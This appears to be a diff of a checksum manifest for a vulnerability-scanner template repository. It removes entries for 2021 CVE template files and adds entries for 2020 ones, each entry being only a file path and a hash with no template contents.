-http/cves/2021/CVE-2021-40972.yaml:cbbe650131207064e923388352c825241a824d4a -http/cves/2021/CVE-2021-40973.yaml:ce418042499d8ab9ff612bc1456d88dfb3ed2015 -http/cves/2021/CVE-2021-40978.yaml:dcc5f6c81823df6954c772c11c12e523bd25e1af -http/cves/2021/CVE-2021-41174.yaml:2f2b80d255d8bba4768df3784932332f796bb331 -http/cves/2021/CVE-2021-41192.yaml:62c8c0dc3fda663fd6efd7378be2e64175ce3996 -http/cves/2021/CVE-2021-41266.yaml:a0435152e2acf0adcbab4f16e84cd848bb15cddf -http/cves/2021/CVE-2021-41277.yaml:57c76e214591be7530d950e18cdfd71b9c3d68af -http/cves/2021/CVE-2021-41282.yaml:4fca08cabf12aa791a2b32409ae40f1aea18a661 -http/cves/2021/CVE-2021-41291.yaml:dfa25b53f5e8791b47cb22a7694d125c93a1bb8a -http/cves/2021/CVE-2021-41293.yaml:ff03cc6fe73bb6863471c690bcbbdbf98a6d14da -http/cves/2021/CVE-2021-41349.yaml:f7c6f02b0771e250838d0ab30abf45e34d2dfd16 -http/cves/2021/CVE-2021-41381.yaml:55346130fa0de046859dac6d061b3e96a0d4accb -http/cves/2021/CVE-2021-41432.yaml:f5e4783c34e0e13400842febdc3c736ea7a4dd08 -http/cves/2021/CVE-2021-41460.yaml:95644d2573b42fe64d43a4f06b89772086c9ac8a -http/cves/2021/CVE-2021-41467.yaml:2b07335d4c29017491aa76b5bc3ce42a61d7d8c2 -http/cves/2021/CVE-2021-41569.yaml:79b59cefe4d61be79229bcecb4778ff258a78162 -http/cves/2021/CVE-2021-41648.yaml:887077ff26993e022db4d7ae229e3684b7ccf8c4 -http/cves/2021/CVE-2021-41649.yaml:bb0ae55d2890b2604d9674ada4feb05ebb296a8c -http/cves/2021/CVE-2021-41653.yaml:f0bda2662c99b42cc6e5305e73c83583e988b800 -http/cves/2021/CVE-2021-41691.yaml:1cac223788be3dd166fab6a55848c58cad4a511a -http/cves/2021/CVE-2021-41773.yaml:994fff7929465adb90b0e624023515ab714e6545 -http/cves/2021/CVE-2021-41826.yaml:4e71ef3337fd8b661d085c434ba7ca0a51eeb9c1 -http/cves/2021/CVE-2021-41878.yaml:62023d10a715d18532b9af19af8f04dba9d52bc0 -http/cves/2021/CVE-2021-4191.yaml:a0d143043b08eec3381ce1ca1979dfd14d97aedf -http/cves/2021/CVE-2021-41951.yaml:7e4bc9b6f68e46e9f78f651541bbc98d261c320d -http/cves/2021/CVE-2021-42013.yaml:1df625d066fe9590ec56bd65c65cb3d1609344bb -http/cves/2021/CVE-2021-42063.yaml:82ec934e217b80496a347edfbcd2fc31df282368 -http/cves/2021/CVE-2021-42071.yaml:d1ccf42e8e0760a55c9b5352612365c6482458d1 -http/cves/2021/CVE-2021-42192.yaml:a01c612d32b070a5bb94ef071b0a207c1d3d6e1d -http/cves/2021/CVE-2021-42237.yaml:8621c70db6fb39b8f4d8aad84b6e4f05107ba4b2 -http/cves/2021/CVE-2021-42258.yaml:cd822bd3e3794f1920e9f369cc972a59a86bcef1 -http/cves/2021/CVE-2021-42551.yaml:3394872e6c24029e63f07e2f0cb4579b074a1a97 -http/cves/2021/CVE-2021-42565.yaml:10401a3ea3cc7cea8d39408905c7e24e6f8b758f -http/cves/2021/CVE-2021-42566.yaml:7b978a18056ffb130222faca40d25e3e810cfc0e -http/cves/2021/CVE-2021-42567.yaml:7a4162031a6029a8330d27ee7f6a87b190381774 -http/cves/2021/CVE-2021-42627.yaml:a4198cbf6899c4b2e52049cda99d37119fb5af48 -http/cves/2021/CVE-2021-42663.yaml:ee17deec09e4ae0f57583cbd7e8c6f410e59994b -http/cves/2021/CVE-2021-42667.yaml:bdcbdc32f0a46fe7711689bc0fcf89a8aee16149 -http/cves/2021/CVE-2021-42887.yaml:84f65c0b2b4849a13807f56f59f69963ddc77670 -http/cves/2021/CVE-2021-43062.yaml:e49800ea5f3fece1b2bf3d7995a9afad45a34858 -http/cves/2021/CVE-2021-43287.yaml:7e7116e29532cd37df41c269dd377c4c97ea5630 -http/cves/2021/CVE-2021-43421.yaml:1b234036baa6075c3c32046dbdaebcdc7fbf7648 -http/cves/2021/CVE-2021-43495.yaml:78f3e293f8f564f275e46329b91c12d001c626e8 -http/cves/2021/CVE-2021-43496.yaml:776cde80c14c12279e8c008e227576ffd3ab13f8 -http/cves/2021/CVE-2021-43510.yaml:59e5a8099f81e766f6dc22ae42a46c044153e7a3 -http/cves/2021/CVE-2021-43574.yaml:cf68a07409955abc95f6451bc0ac1cae80d9f899 -http/cves/2021/CVE-2021-43725.yaml:eb6c49340526e0b1d96236c8b1f51246a0d4f8a2 -http/cves/2021/CVE-2021-43734.yaml:25066ad11d90974027d0169fb4ad6b5edeb6f4b0 -http/cves/2021/CVE-2021-43778.yaml:997e5af31b3f4eb0f1c31c3931ea64e90365ca9a -http/cves/2021/CVE-2021-43798.yaml:4dbd42703c37d17ad4ebbdce8079f11a5b700e5d -http/cves/2021/CVE-2021-43810.yaml:3f103f286aa2ceb075438187267dfea4d2f7ab55 -http/cves/2021/CVE-2021-44077.yaml:73d4a2961678ce7cbb2fcb7bb4080ad6bee64784 -http/cves/2021/CVE-2021-44138.yaml:dcd3c35b3c646126e444b1fadf9afb59aa321df7 -http/cves/2021/CVE-2021-44139.yaml:585c528577c4d2f27359ed1051ebd4d85d6c36d1 -http/cves/2021/CVE-2021-44152.yaml:1d81266929015f14384c7bd92eb1a87e4d9a3786 -http/cves/2021/CVE-2021-44228.yaml:a6d84312f7768270ccfeead91d7dda382f1cf97a -http/cves/2021/CVE-2021-44427.yaml:5e305963257d893b9f4a816ac62485f21082e09f -http/cves/2021/CVE-2021-44451.yaml:a593725e30563d4af1418bc41831bc7e3b78b793 -http/cves/2021/CVE-2021-44515.yaml:7d47e90c401fca6069c461fc6773cb117efb2be3 -http/cves/2021/CVE-2021-44528.yaml:be4dd3f0aee83d2aa2214ea4e553760d7eb884bc -http/cves/2021/CVE-2021-44529.yaml:0c513c0fd02879896092d9f5ad41da26ef95b2e1 -http/cves/2021/CVE-2021-44848.yaml:2dc388543230101545331b9e57b60e6407f040f5 -http/cves/2021/CVE-2021-45043.yaml:bed7cfc62be3be543ba57204461fbaca7931f0f9 -http/cves/2021/CVE-2021-45046.yaml:43a963b0a3d4a7dfa434b0c4cc0658687332498a -http/cves/2021/CVE-2021-45092.yaml:121786092c19b51349f0fe7ab0a6e7e7a6cb63b3 -http/cves/2021/CVE-2021-45232.yaml:508daa4cd6b5c3b59f7c94bfd619ccb7f807f415 -http/cves/2021/CVE-2021-45380.yaml:270f36fff8cde162be3b98dc19040c1e18be47e2 -http/cves/2021/CVE-2021-45422.yaml:fe54454b403c276b7fc2149c048dc5c20d0f75d1 -http/cves/2021/CVE-2021-45428.yaml:1474f1c3fd51be0aa5be6cef6f1e4fb34659d630 -http/cves/2021/CVE-2021-45967.yaml:0393b2c379d4a49e6b85dd32ffb6e316071e7f65 -http/cves/2021/CVE-2021-45968.yaml:d39821dd70ced3521221f8ca66849b3b92b248d8 -http/cves/2021/CVE-2021-46005.yaml:0315695528968d2667e9824dc626cd1832cad674 -http/cves/2021/CVE-2021-46068.yaml:ecb5c2085413d8d37e44788e54b2ed864e79fdbe -http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca -http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91 -http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4 -http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238 +http/cves/2020/CVE-2020-10546.yaml:f962c8d562cb069384bbca258b1f115fdc4c79c4 +http/cves/2020/CVE-2020-10547.yaml:af775730df472cb87598239f9679590d24c4c513 +http/cves/2020/CVE-2020-10548.yaml:14d5300135b26a3ec78596300a1631daf5710db0 +http/cves/2020/CVE-2020-10549.yaml:c0773f01e1f31de8e9e168bcdc45c96feb781649 +http/cves/2020/CVE-2020-10770.yaml:10fbd4be42b0f293ffa602b6f55a09758a77f6cb +http/cves/2020/CVE-2020-10973.yaml:06479d6db05d2d0a793b610689a45b36e4f2376a +http/cves/2020/CVE-2020-11034.yaml:bd90f90361e94d9ee8bd37b8dd99d47f9e1db472 +http/cves/2020/CVE-2020-11110.yaml:ee6612bd26d13247b262f97e38bf05454524ec4c +http/cves/2020/CVE-2020-11450.yaml:ee82bd32cbdd4a3d21650ff7fca47d8ab23c95a4 +http/cves/2020/CVE-2020-11455.yaml:a2915cc6f64d5c33c93e4b000edd3ef95093bc24 +http/cves/2020/CVE-2020-11529.yaml:612985330b39eefa81d0d15a6f73b4d4e527afc9 +http/cves/2020/CVE-2020-11530.yaml:8bef34db7f138b633bbd8d34e3e85d8f4a136e87 +http/cves/2020/CVE-2020-11546.yaml:6bdd0b14b344bfb41c83a248299bf91a33ce6a1c +http/cves/2020/CVE-2020-11547.yaml:f6623f296c5896fa57aecdac40f6e4ca6312a7bf +http/cves/2020/CVE-2020-11710.yaml:7f03b0e6f7082424549fee844100dc73c8e27cae +http/cves/2020/CVE-2020-11738.yaml:87efcd1f63371291d8fbd42ca0d7a9a93d2d0bdb +http/cves/2020/CVE-2020-11798.yaml:ae7b7d2e022103cba8a4cacc64dc978ec36cc6f7 +http/cves/2020/CVE-2020-11853.yaml:78abbf56f2728480032a010effda5d13d447e64d +http/cves/2020/CVE-2020-11854.yaml:85424a364df3e2e8dd18fc7afaf670841c82fdda +http/cves/2020/CVE-2020-11930.yaml:f003956f75660fccf2e9f33e34c457ade42c7bca +http/cves/2020/CVE-2020-11978.yaml:b270a16b6e35514a534801aba7783115caa5f3e7 +http/cves/2020/CVE-2020-11991.yaml:047306e5beabddd044054e4645eadc3fe9024593 +http/cves/2020/CVE-2020-12054.yaml:1731bfe4b901cebad45673a45ca4f92f1b069343 +http/cves/2020/CVE-2020-12116.yaml:1de0bc09cb37c0658da61f3987112e0d7dfa3e68 +http/cves/2020/CVE-2020-12127.yaml:9ee0a44080a11e33bd553826a04c8b8c624be7f3 +http/cves/2020/CVE-2020-12447.yaml:f92a06e15d5efcecaa6b165a3fad180ca1da79ae +http/cves/2020/CVE-2020-12478.yaml:84da6bcd149244cbbb43e6087fa499d79e4a640d +http/cves/2020/CVE-2020-12720.yaml:9a3cba63f2e7c672122bdcd567cd0378e481c8f3 +http/cves/2020/CVE-2020-12800.yaml:f2daa57832c51914b82fe5779a2434de654a6d84 +http/cves/2020/CVE-2020-13117.yaml:492db1dd9a20891a01fb706c09529b3fada96b7e +http/cves/2020/CVE-2020-13121.yaml:8b58bc52ee3fc3c47acad28d2c72a6689e778e02 +http/cves/2020/CVE-2020-13158.yaml:4c5313407e2bb1f3589140e63a296c0caf9d1e26 +http/cves/2020/CVE-2020-13167.yaml:0dc9274d51e23f87e0be0ba2d5eb7e39bc03792a +http/cves/2020/CVE-2020-13258.yaml:6ceabf417327dc80ae8ae0f3b2588c0c45003c2e +http/cves/2020/CVE-2020-13379.yaml:b84d2b57eb7b003d01ae043c76277e461e3bcf2e +http/cves/2020/CVE-2020-13405.yaml:6a43f48d350aebf56c7a4ce8bb5c79c5e387d1ef +http/cves/2020/CVE-2020-13483.yaml:a3b8763ec3332770c43721cd46a9f3d958d814f4 +http/cves/2020/CVE-2020-13700.yaml:a7fd845c0b74b8ce5c06d5c99cd16af416d7ff95 +http/cves/2020/CVE-2020-13820.yaml:96ee542ebd3d26e769e9a0a941ad2e2690d6bcad +http/cves/2020/CVE-2020-13927.yaml:d156819cd061552ed5daf622dfd0d370fa3b183b +http/cves/2020/CVE-2020-13937.yaml:ef4df63f980eb167713f75453b487a411065a694 +http/cves/2020/CVE-2020-13942.yaml:ceafbc7d93460a1e84a014408ddab7ffa1e5d3f0 +http/cves/2020/CVE-2020-13945.yaml:5432177946515c3b19ca8fea2389171800b472bb +http/cves/2020/CVE-2020-14092.yaml:24b7a232cde743bf096c29f164c91f91ea302a43 +http/cves/2020/CVE-2020-14144.yaml:647a770766ebfd9a857c4c34cc5d2657749f78c2 +http/cves/2020/CVE-2020-14179.yaml:9d5f4a8e59de2c8cd0d8cc7703ed1966c690ffd0 +http/cves/2020/CVE-2020-14181.yaml:8c88c550a35fc5d79e1e59867503c9f889c69994 +http/cves/2020/CVE-2020-14408.yaml:523028eab8f36230eae92b4d3668cf4d881502ca +http/cves/2020/CVE-2020-14413.yaml:6ad5e6331fbe62cbd5835f09a8b95f5631e0ba96 +http/cves/2020/CVE-2020-14750.yaml:977cb1156bb1c4534da0c46a25d7f5852c0802f9 +http/cves/2020/CVE-2020-14864.yaml:4210fa90525bbbd7e26a505fd00f6ff5fb38509a +http/cves/2020/CVE-2020-14882.yaml:32180021e58dc82a45ef608eaedc9122a62cd19f +http/cves/2020/CVE-2020-14883.yaml:a51b063eb33297a9324d363584de9fdaccf07f83 +http/cves/2020/CVE-2020-15050.yaml:cfe1078d06ccc79368dfa03dec8c5a19133fc05a +http/cves/2020/CVE-2020-15129.yaml:3566a517a359f2aff1804c52722e79eeada28698 +http/cves/2020/CVE-2020-15148.yaml:e9cb731757028be6f49a0adca06fd683697d5d0c +http/cves/2020/CVE-2020-15227.yaml:3786c170cbaeccabe111c91575f4b672da2fce1c +http/cves/2020/CVE-2020-15500.yaml:7bda3489ea1c9bfd08ce30f9a2e7404a3f21d1e1 +http/cves/2020/CVE-2020-15505.yaml:cdc25c455d09390a7289e7e0f519d62c51e0d17f +http/cves/2020/CVE-2020-15568.yaml:595340c7ee5f8217b9d2e16bcfdaa5f158269520 +http/cves/2020/CVE-2020-15867.yaml:58c12f95831855f54f7e2050d4620a03f091366b +http/cves/2020/CVE-2020-15895.yaml:79e5474c09d3c0f80ae694a1d2b2a9ce17e0608e +http/cves/2020/CVE-2020-15920.yaml:cc33f2dbd35b2198ed816291b24b656afd5f6e31 +http/cves/2020/CVE-2020-16139.yaml:f13080e7483b9cbbb5e6af1231e8557c2a0f12b1 +http/cves/2020/CVE-2020-16846.yaml:4bee70e88949d1b102e19f7c68394ce48dc760d7 +http/cves/2020/CVE-2020-16952.yaml:3d0d922a266101059dc4b3d3f978d14b84405024 +http/cves/2020/CVE-2020-17362.yaml:1df86b93e46eeee6d6cf0745cd5dcb1cde46318f +http/cves/2020/CVE-2020-17453.yaml:03e9e548bfe57a1c5927050b038f086b1434faea +http/cves/2020/CVE-2020-17456.yaml:52b7f4f92bb9d1fd1af119f801cf0eaac3f187d2 +http/cves/2020/CVE-2020-17463.yaml:cdd2aeec08aaa68a2d77bfcce09f7b39b3f9b956 +http/cves/2020/CVE-2020-17496.yaml:b403e7498235705a5007a5fd5d60b30b04701f4a +http/cves/2020/CVE-2020-17505.yaml:0ac6516e1a9e61769b89c65107b9c22d17f92ed0 +http/cves/2020/CVE-2020-17506.yaml:a9ab8370c68ee1410d5ae8d67fbd133a990864ed +http/cves/2020/CVE-2020-17518.yaml:bc04c9b47faf5fab8f76fe11768a6ab95183a0e0 +http/cves/2020/CVE-2020-17519.yaml:ce52cd0fe34b1e935e786bc5b97ccc01f4ad58bb +http/cves/2020/CVE-2020-17526.yaml:e115317a7f8d2267d186057443ed15a928d826eb +http/cves/2020/CVE-2020-17530.yaml:e9ec6df5a27b69dab9f4c98dd90b3899bda22c60 +http/cves/2020/CVE-2020-18268.yaml:d2eb30961afad309bf848c5ee16c00f4b4dc2a7e +http/cves/2020/CVE-2020-19282.yaml:261267b9186dc73e0ab267e63dcd4325daaa0d90 +http/cves/2020/CVE-2020-19283.yaml:23828c0fd4e81c76aaca13f72464f3d8551812af +http/cves/2020/CVE-2020-19295.yaml:3301c5ac756ed795c068ba8bcc4a85cfb2121eab +http/cves/2020/CVE-2020-19360.yaml:7ac96b947be20f7dc4e0f4aebe80af023477c6b5 +http/cves/2020/CVE-2020-1943.yaml:2db599818d9e326e92c85cd50e55c3f0db38fd87 +http/cves/2020/CVE-2020-19515.yaml:5531859d97018a14b46ef666a6280059dfd6ef85 +http/cves/2020/CVE-2020-1956.yaml:689f1898a8fe3ce527db226b9f4bc6808e84fb60 +http/cves/2020/CVE-2020-19625.yaml:7e8a552a898ef652ec5b7a34790f7829b27fdbff +http/cves/2020/CVE-2020-20285.yaml:8f01c22fbccf4c805753c9c5046d754474dde7cf +http/cves/2020/CVE-2020-20300.yaml:4bf5aedb9d82f1b99913c97487d9c17095173c23 +http/cves/2020/CVE-2020-2036.yaml:12a33dc690d72330b93f977466d22605e17e8137 +http/cves/2020/CVE-2020-2096.yaml:388b333ac57cc01ee709edf274b6e21106190dd6 +http/cves/2020/CVE-2020-20982.yaml:88492de9e885210eb91a8443664cd122ee9de6fa +http/cves/2020/CVE-2020-20988.yaml:3aeae58e64cccc6cbd4f9909344c98a2aa9a05dd +http/cves/2020/CVE-2020-21012.yaml:283d543d70d15ed73a54d93ddc413e05bcfbb3be +http/cves/2020/CVE-2020-2103.yaml:1491b329af6a8a1e67524d53be61ecc148e5bde0 +http/cves/2020/CVE-2020-21224.yaml:3bd6b66502296a01ad6f07a2f5e86fc812264a9f +http/cves/2020/CVE-2020-2140.yaml:a7e6f5a17b1fdc80cdcf5e04a504f41c87ada843 +http/cves/2020/CVE-2020-22208.yaml:f59c8a959a4a878877a92d43f854cda6f1283e8a +http/cves/2020/CVE-2020-22209.yaml:2cb098867a4a6cef7ea7fba8de40efdd524310e3 +http/cves/2020/CVE-2020-22210.yaml:db5b19ac7cd52a966117b0b56b3b810ef6652167 +http/cves/2020/CVE-2020-22211.yaml:9d69ea03546f966536c838d1a15e671c5f50a118 +http/cves/2020/CVE-2020-22840.yaml:ec6d9177d558d5d5e70b9a4ec1d82262f23a1166 +http/cves/2020/CVE-2020-23015.yaml:cdd5c29d41e9cbdc091db79ff43cc67fdf94adca +http/cves/2020/CVE-2020-23517.yaml:f2215b5df9907a5e5ade18e48e9e4e1357e506c9 +http/cves/2020/CVE-2020-23575.yaml:f304c0ecc8b809afb90acb671338e977e3743eac +http/cves/2020/CVE-2020-23697.yaml:e7df73b8a2a84dc8add355654e77509e882b5f4d +http/cves/2020/CVE-2020-23972.yaml:0801874b8e84f8859af32bec813bec3e0add2f15 +http/cves/2020/CVE-2020-24148.yaml:cd7aa4182430662ca9701ccf3a738c3d2bbcf06a +http/cves/2020/CVE-2020-24186.yaml:9acb451ae90b0fbd240987bd2bd550c65d60dd0f +http/cves/2020/CVE-2020-24223.yaml:fd9504313cae8c782067db3a7fe57f762a8e5c0f +http/cves/2020/CVE-2020-24312.yaml:db59862b1303ff238360770fb8e90baa9b626a55 +http/cves/2020/CVE-2020-24391.yaml:e36ec660ba76d8e3cd3c9712761d8c12d4387ae8 +http/cves/2020/CVE-2020-24550.yaml:e5a66858a64f91a579d5ba2f5823deb901db3920 +http/cves/2020/CVE-2020-24571.yaml:bc263629d4800e676aaf0edb62c478e3931ac5e4 +http/cves/2020/CVE-2020-24579.yaml:63aebf6ed3e2ce9f83728c05b8266d8675354062 +http/cves/2020/CVE-2020-24589.yaml:8aa6ecb23e75d8c0ac83d7841636d1af9b25fbd8 +http/cves/2020/CVE-2020-24902.yaml:310cec1245917c5a057b6e7bc8a1da301d912405 +http/cves/2020/CVE-2020-24903.yaml:e3ad15b428e14e9ccd6dc9ce5c45d00d5ea0c955 +http/cves/2020/CVE-2020-24912.yaml:4c0c633b87e34712a4bb8a7cd2031d4b5053d8d7 +http/cves/2020/CVE-2020-24949.yaml:e32f1ebf3d90deecb7ea134557b9feacdf4e3542 +http/cves/2020/CVE-2020-25078.yaml:fbac27bd89959128aa8eba42bb2cd918dcd6b47b +http/cves/2020/CVE-2020-25213.yaml:f73a12327ad63badc54b4121d06cb8419d4aa2a9 +http/cves/2020/CVE-2020-25223.yaml:06c4f320fb64d20429d9103ac00f97f74eb9ee94 +http/cves/2020/CVE-2020-25495.yaml:93ef16911dc7e29000131781671e201d30552d25 +http/cves/2020/CVE-2020-25506.yaml:93b0871ef8cb0c4f7f3595104642e122f283222c +http/cves/2020/CVE-2020-2551.yaml:afdc7ce9596e5421adeb99b9f0152ee65eb0a98d +http/cves/2020/CVE-2020-25540.yaml:d3f5fbef216aac6672a87a192213b7a5095e9170 +http/cves/2020/CVE-2020-25780.yaml:71a29c9f8e0f0d25eec141d0afa198bf0a17f20d +http/cves/2020/CVE-2020-25864.yaml:4516197591b180a531cf6589e5b3663de3202c75 +http/cves/2020/CVE-2020-26073.yaml:7dac56411c8adae2fcc2fc30285e67deab56f746 +http/cves/2020/CVE-2020-26153.yaml:efa06b0a4c8446c109476828de6f206f0eacae1a +http/cves/2020/CVE-2020-26214.yaml:f38fea7bcd0c0d6075ad2066bd949dec0c2e132a +http/cves/2020/CVE-2020-26217.yaml:2aaa083c1374ba2dc5e48c8ec95a38395a8e1ae4 +http/cves/2020/CVE-2020-26248.yaml:406f30cce4a747d4bba6cc0ce7278f6705ff43d6 +http/cves/2020/CVE-2020-26258.yaml:7c738ac2b66396905e054df4c2573bca929a3063 +http/cves/2020/CVE-2020-26413.yaml:457f138e8fc9928450e0c2117c5b54a37b024a41 +http/cves/2020/CVE-2020-26876.yaml:38e318a863696e908ddc5be2473a326c4c8f7864 +http/cves/2020/CVE-2020-26919.yaml:3ee3cda1657471fa848b72bcc4d4633055444ee2 +http/cves/2020/CVE-2020-26948.yaml:5761680a4e4722def1822f37893057bb3f03e84f +http/cves/2020/CVE-2020-27191.yaml:cf7023ff41aba8f38b6d40335f5373161c7b85f9 +http/cves/2020/CVE-2020-2733.yaml:aaa9b2e7493bb14171c37bb60f92c7aa025737b0 +http/cves/2020/CVE-2020-27361.yaml:b773a239e5b6ef316c129e2138f5a3e211dd4f59 +http/cves/2020/CVE-2020-27467.yaml:bd3e4ea0b0ff7fe966315f5898452d9d740bce34 +http/cves/2020/CVE-2020-27481.yaml:66944b371313f13fc873c67803a1be753f783e36 +http/cves/2020/CVE-2020-27735.yaml:035a3399512fcb44de46e0bf40bbdd10a9cb1372 +http/cves/2020/CVE-2020-27866.yaml:8731a8d8b1c86dd8eb6855475069cb9cab75af15 +http/cves/2020/CVE-2020-27982.yaml:19bdb475b2ae3ceca6caf7e3130798660496f093 +http/cves/2020/CVE-2020-27986.yaml:61c25ea9e62492e746f5d729e6285e38d33f1004 +http/cves/2020/CVE-2020-28185.yaml:d739dc624f7045ce1b9a8aec3419447116eada64 +http/cves/2020/CVE-2020-28188.yaml:93f82064d1c3880e50eadf322ad730c5d95c48d9 +http/cves/2020/CVE-2020-28208.yaml:f27912be86b8eee2b1431eb8abbf97932c0c59c7 +http/cves/2020/CVE-2020-28351.yaml:24dee02e9af9bb37f06f247f7f911118faa8faff +http/cves/2020/CVE-2020-28871.yaml:a8b686242e5b474d7c90f9e0c186465480b6300b +http/cves/2020/CVE-2020-28976.yaml:b1342a260f6834061fff2066a9905337bcbcc035 +http/cves/2020/CVE-2020-29164.yaml:d4c4bd3eb0953f7c79b4be28adbc6d337ef8e298 +http/cves/2020/CVE-2020-29227.yaml:c023e84556284635c9cd49e57ee08aa2a0b01a5c +http/cves/2020/CVE-2020-29284.yaml:fd5e301c8bfa360ad0f20a9d458ce472f81d1904 +http/cves/2020/CVE-2020-29395.yaml:811d82a62c0271a97b787e056b44e9871deeb2b9 +http/cves/2020/CVE-2020-29453.yaml:5d8e63744b2340a68baf1a4f069bfc8fee7fa6ad +http/cves/2020/CVE-2020-29583.yaml:eea17591ab47284355aa809f86fd1d9208c9e769 +http/cves/2020/CVE-2020-29597.yaml:4a171d7d478bbad20267fa0460ffeab03369429a +http/cves/2020/CVE-2020-3187.yaml:2efeb634830701f9b4a58a3edde7528c217f95b4 +http/cves/2020/CVE-2020-3452.yaml:b7ac7132a1292751772810c23ad81a5183e9cd41 +http/cves/2020/CVE-2020-35234.yaml:2af14e6ceb019cc797f6c9ec43f83fa6be67a545 +http/cves/2020/CVE-2020-35338.yaml:52015f21746c1a0cda39550c98f2a496ed7c29c9 +http/cves/2020/CVE-2020-35476.yaml:505a740ae27a171c9ba3cd4045ad22e2e3c163db +http/cves/2020/CVE-2020-35489.yaml:c8eb843a2c8ae76a1b04462d3a315a11eb926fd3 +http/cves/2020/CVE-2020-35580.yaml:b3baca2012cc592d2ff26638ff9770079924f0a8 +http/cves/2020/CVE-2020-35598.yaml:e47b7777e7414d606af1d719f3a408a039b30e2c +http/cves/2020/CVE-2020-35713.yaml:8960c9f6852d08bb0b80cb27177a17357adbcf8c +http/cves/2020/CVE-2020-35729.yaml:b0e52c87d27dcc2b3baacc63312c1a654194cf83 +http/cves/2020/CVE-2020-35736.yaml:73065de53671c9c1cba35cb13267980b68660f80 +http/cves/2020/CVE-2020-35749.yaml:382dff0f6aebb91c96172ba40083ef152773fcc1 +http/cves/2020/CVE-2020-35774.yaml:ea05a3580603ff6eade6ec059ed85c8588b17920 +http/cves/2020/CVE-2020-3580.yaml:71c07503ee92760ad3a569abcf77afa8126ea7ef +http/cves/2020/CVE-2020-35846.yaml:bd45a8eefda85d047e3023b60cdcb2b8a6efa610 +http/cves/2020/CVE-2020-35847.yaml:47595683cd49c6a72d34da9e09f2492c2dad439e +http/cves/2020/CVE-2020-35848.yaml:a3026bb140e9856af50595c2afd564ee0120ed63 +http/cves/2020/CVE-2020-35951.yaml:780178ac5842ccee789adb3f6ab3fa09b4721e76 +http/cves/2020/CVE-2020-35984.yaml:494bbe80b257a676eca084a4a3facd2a3e092a7a +http/cves/2020/CVE-2020-35985.yaml:b52d84896ed42d051e9ca6f53ea0157a00e4b831 +http/cves/2020/CVE-2020-35986.yaml:2ff63b544f87b259567f277fc5cec1a2532a5ed1 +http/cves/2020/CVE-2020-35987.yaml:69cc026e54d3ca8c81fecaea60d525224d0475af +http/cves/2020/CVE-2020-36112.yaml:5b6f72073bb165afff4aa172e1c6b10476c5ecb7 +http/cves/2020/CVE-2020-36289.yaml:5e5d997a16304cc19e68b466eb5bad002bd6f394 +http/cves/2020/CVE-2020-36365.yaml:8d346886b7659ff1a8728886f857ce16b878bce4 +http/cves/2020/CVE-2020-36510.yaml:6194ff4e5f03915410f27d778a60295ecfdaa327 +http/cves/2020/CVE-2020-4463.yaml:66a03e112cfbdeba6ceda305236cc38bfb62b0eb +http/cves/2020/CVE-2020-5191.yaml:eba38811ca4c872fef98dc9802395355f7a3c05b +http/cves/2020/CVE-2020-5192.yaml:d3936e466c1eaf0ca4d5313767d622209b37bfc9 +http/cves/2020/CVE-2020-5284.yaml:d1a71d0aa42f4aff2d5f7e84d3fdc8e7091fe2af +http/cves/2020/CVE-2020-5307.yaml:7ada9b22c17b517e7d968d1502f05cb0547f9189 +http/cves/2020/CVE-2020-5405.yaml:a209b10118f161e79b99af89ec0f0794860c102e +http/cves/2020/CVE-2020-5410.yaml:86588030feb1f510cc14d490476a274027404558 +http/cves/2020/CVE-2020-5412.yaml:6a8eda44a5161242f50922860fdae027baaff3cd +http/cves/2020/CVE-2020-5775.yaml:c6b2814212f9b103b704f5273b3491fffab06e5b +http/cves/2020/CVE-2020-5776.yaml:5c403f9fb0c1d24f2135bcd6d41a1490090d3848 +http/cves/2020/CVE-2020-5777.yaml:4eeb1a0d59d7a8728c3d0204618ae903ef67db85 +http/cves/2020/CVE-2020-5847.yaml:1377f9fdc66b70d1a4ee7224005f6f86c763c736 +http/cves/2020/CVE-2020-5902.yaml:2d243f121b4c451349cdcf8b8128db404a6dbd32 +http/cves/2020/CVE-2020-6171.yaml:8d45c89746dc65c488841664a3e952b7093646fe +http/cves/2020/CVE-2020-6207.yaml:706402909523a9c5510d0874a2149b3c0b7f8778 +http/cves/2020/CVE-2020-6287.yaml:84873187a485444302eb3140a1fbf7d9d441a3f6 +http/cves/2020/CVE-2020-6308.yaml:e74347f7c55c2494f02f60f8c9ef148180e19d41 +http/cves/2020/CVE-2020-6637.yaml:83865efaf20ba293a391b004746ae9093fbb3e32 +http/cves/2020/CVE-2020-7107.yaml:51af76d4c88776794c5e16456d78fdcc1497c0ac +http/cves/2020/CVE-2020-7136.yaml:5dc86c2890bf0a2db546ec2054b8c1bb1ee3670b +http/cves/2020/CVE-2020-7209.yaml:2697402254cc6d23fbc2e116cce98916ebd86b3e +http/cves/2020/CVE-2020-7318.yaml:0ea0f63d62e4ced3c2719fee6ed52b83071b5b12 +http/cves/2020/CVE-2020-7796.yaml:96c83a55dda68498bf38218021f5ffe45de17e68 +http/cves/2020/CVE-2020-7943.yaml:460abf66fdd0f89bfd7cf95a8e4d4dd1b99e6249 +http/cves/2020/CVE-2020-7961.yaml:63baaa7669c6bf568d7fae2be856f3ec9c01853f +http/cves/2020/CVE-2020-7980.yaml:9f70ddcf8bd8a2a08cae7948c75f801a7c6f9bef +http/cves/2020/CVE-2020-8115.yaml:7303b9808a5bcfaabc885d0da7a8aba4bc1ef8ac +http/cves/2020/CVE-2020-8163.yaml:6e0b71adc5cd6ec18bf6a9af412a0ab91051ef61 +http/cves/2020/CVE-2020-8191.yaml:5c77e384df95a546355282b41bf1ba3718c3a666 +http/cves/2020/CVE-2020-8193.yaml:a33e347adac168aba278e8f39387cbfcc0ac28bf +http/cves/2020/CVE-2020-8194.yaml:9d5782d926f42590cef555b0b6c0a3952352ac97 +http/cves/2020/CVE-2020-8209.yaml:09d7cb23deb28cf0157931f4209353b7c5d18d88 +http/cves/2020/CVE-2020-8497.yaml:afd8fae6136c2682306f05af49e17cc6c8ea2bce +http/cves/2020/CVE-2020-8512.yaml:c9fdce53f409dc102a08fe6863145f873da805a7 +http/cves/2020/CVE-2020-8515.yaml:48e199b52e82f133f5c4fa33e92422672dbdaf2a +http/cves/2020/CVE-2020-8641.yaml:90fcfc97976c92de25d573ea752b46efa989fea3 